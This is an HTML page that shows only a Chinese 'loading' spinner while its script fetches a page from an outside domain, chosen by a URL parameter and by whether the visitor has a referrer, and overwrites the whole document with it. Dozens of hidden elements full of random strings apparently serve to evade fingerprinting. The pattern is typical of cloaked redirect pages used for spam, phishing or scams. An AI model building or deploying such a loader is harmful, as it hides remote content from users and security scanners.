<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TQdlyi {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TQdlyi .JoCPGI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TQdlyi .content {
            line-height: 50px;
            text-align: center
        }

        .TQdlyi .img {
            width: 100%
        }

        .TQdlyi .U14WSf0UjN {
            text-align: center
        }

        .TQdlyi .U14WSf0UjN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TQdlyi .U14WSf0UjN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TQdlyi .U14WSf0UjN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TQdlyi .U14WSf0UjN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TQdlyi .U14WSf0UjN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TQdlyi .U14WSf0UjN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TQdlyi .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rtskGqdFopj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var xE0MQ5C = rtskGqdFopj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ xE0MQ5C +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ xE0MQ5C +".html?a=share";
		}
		
        F8at2nqX5=url+"#"+new Date().getTime();
        F8at2nqX5 && function() {
            $.get(F8at2nqX5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Oh2HyYYA8VszwostHezTQcRc0Uo0kaNXuwaj9mGSR1Dn</span>
<span style='display:none'>Oh2HyYYA8VszwostHezTQcRc0Uo0kaNXuwaj9mGSR1Dn</span>
<div style='display:none'>r1IcM7Nuja52XUQywbHQjdmX2zi8IsShtq3g6QnQkiRENBiVZiuCHRjKCFtdryXpA1c</div>
<img  src='' style='display:none'>
<li style='display:none' >JoXMRbkqh3IIlZ4bCvn6Ft7qDqJqt1zOu5tvimCnKICW</li>
<p  style='display:none'>L3wCy8uTUGdZ1vrt0WogKCenoucRMYAaYMsG8QvRb7zdNjPegwEwa4w9xMXVItikAPskK2QOAfghRrfKT4AaD7Zn3U167RfZi7Wo</p>
<ul style='display:none' >zLyu07XgKWEqCwzvr9Xn43Kf6mH3I1uETtECxWLuYtg6X9TRPgTAuGgpGp9zuuT6QkcUdoYQwmp12r</ul>
<div style='display:none'>r1IcM7Nuja52XUQywbHQjdmX2zi8IsShtq3g6QnQkiRENBiVZiuCHRjKCFtdryXpA1c</div>
<h1 style='display:none' >Q3vBFWW8HRf6WtMWNkZ5</h1><div class="TQdlyi">
    <div class="JoCPGI">
        <div class="U14WSf0UjN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>Jfa5PlNe66i2iQdt5mNmPUwxnZDfD1bo</a>
<b style='display:none' >jx2KNPKF1Skdtu0iqBd2kwy8zP55n2uKTMg0TxlcbnfGBvcfhymLhtg06Gq7xms8p3</b>
<span style='display:none'>otrumnNTd43mPoO1dWyeIp0qcTxMPl5R75cpYsu8dUR2ZyDvxzeUz3o</span>
<b style='display:none' >jx2KNPKF1Skdtu0iqBd2kwy8zP55n2uKTMg0TxlcbnfGBvcfhymLhtg06Gq7xms8p3</b>
<span style='display:none'>otrumnNTd43mPoO1dWyeIp0qcTxMPl5R75cpYsu8dUR2ZyDvxzeUz3o</span>
<b style='display:none' >jx2KNPKF1Skdtu0iqBd2kwy8zP55n2uKTMg0TxlcbnfGBvcfhymLhtg06Gq7xms8p3</b>
<p  style='display:none'>VRnbjm1tmQC4avYDqJqgzOSOq5t2JG7wW6Kg3tyJ</p></body>
</html>